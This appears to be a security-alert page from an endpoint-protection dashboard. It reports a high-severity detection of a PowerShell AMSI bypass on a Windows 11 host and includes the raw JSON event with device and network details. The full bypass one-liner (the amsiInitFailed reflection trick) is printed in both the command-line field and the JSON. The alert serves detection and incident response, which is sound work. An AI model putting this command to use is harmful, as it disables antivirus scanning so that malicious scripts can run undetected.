Alert Details - DeFender X

Alert Information High

Alert ID: ind:47186ef241ea495885522e5d4930eda3:35325307788-10163-11229968
Composite ID: 84393bf974fd44bda943a25a6a7bc27f:ind:47186ef241ea495885522e5d4930eda3:35325307788-10163-11229968
설명: A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script.
호스트: TEAHEE
상태: new
생성 시간: 2025-12-22 07:59:41
업데이트 시간: 2025-12-22 08:58:41

MITRE ATT&CK

Tactic: Execution
Technique: PowerShell

Command Line

powershell  -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"

Raw JSON Data

{"id":"ind:47186ef241ea495885522e5d4930eda3:35325307788-10163-11229968","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:47186ef241ea495885522e5d4930eda3:35325307788-10163-11229968","agent_id":"47186ef241ea495885522e5d4930eda3","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"A PowerShell script attempted to bypass Microsoft\u0027s AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script.","severity":70,"severity_name":"High","confidence":80,"tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","cmdline":"powershell  -c \u0022[Ref].Assembly.GetType(\u0027System.Management.Automation.AmsiUtils\u0027).GetField(\u0027amsiInitFailed\u0027,\u0027NonPublic,Static\u0027).SetValue($null,$true)\u0022","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume3\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","sha256":"0ff6f2c94bc7e2833a5f7e16de1622e5dba70396f31c7d5f56381870317e8c46","status":"new","type":"ldt","created_timestamp":"2025-12-21T22:59:41.36210171Z","updated_timestamp":"2025-12-21T23:58:41.33657132Z","device":{"device_id":"47186ef241ea495885522e5d4930eda3","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.20309.0","hostname":"TEAHEE","local_ip":"172.27.1.29","external_ip":"119.206.248.238","mac_address":"e8-84-a5-3f-53-7c","platform_name":"Windows","os_version":"Windows 11"},"aggregate_id":"aggind:47186ef241ea495885522e5d4930eda3:9248859301","CreatedAt":"2025-12-22T07:59:41.3621017+09:00","UpdatedAt":"2025-12-22T08:58:41.3365713+09:00"}

Quick Info

Severity High
Score 70
Agent ID 47186ef241ea495885522e5d4930eda3

Actions

Falcon Console에서 보기 목록으로 돌아가기